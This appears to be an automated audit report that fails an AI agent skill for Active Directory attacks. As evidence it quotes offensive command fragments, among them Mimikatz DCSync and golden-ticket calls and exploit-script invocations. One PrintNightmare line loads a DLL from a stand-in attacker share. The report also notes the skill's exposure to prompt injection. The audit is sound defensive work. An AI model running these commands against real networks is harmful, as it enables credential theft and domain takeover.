Active Directory Attacks
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONCREDENTIALS_UNSAFEPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill provides numerous commands for high-risk offensive operations. Evidence: Use of
lsadump::dcsync,kerberos::golden, andpsexec.py(SKILL.md and references/advanced-attacks.md). - REMOTE_CODE_EXECUTION (HIGH): The skill references and provides commands to execute external exploit scripts and malicious DLLs. Evidence:
python3 cve-2020-1472-exploit.py,python3 sam_the_admin.py, andpython3 CVE-2021-1675.py '\\attacker\share\evil.dll'(SKILL.md). - CREDENTIALS_UNSAFE (HIGH): Detailed instructions for extracting sensitive credentials and Kerberos tickets. Evidence: Kerberoasting, AS-REP Roasting, and DCSync attack patterns (SKILL.md).
- PROMPT_INJECTION (LOW): Vulnerability surface for indirect prompt injection. 1. Ingestion points: User-provided domain names, usernames, and passwords in SKILL.md. 2. Boundary markers: Absent. 3. Capability inventory: Subprocess calls to Mimikatz, Rubeus, and Impacket across all scripts. 4. Sanitization: Absent.
Recommendations
- AI detected serious security threats
Audit Metadata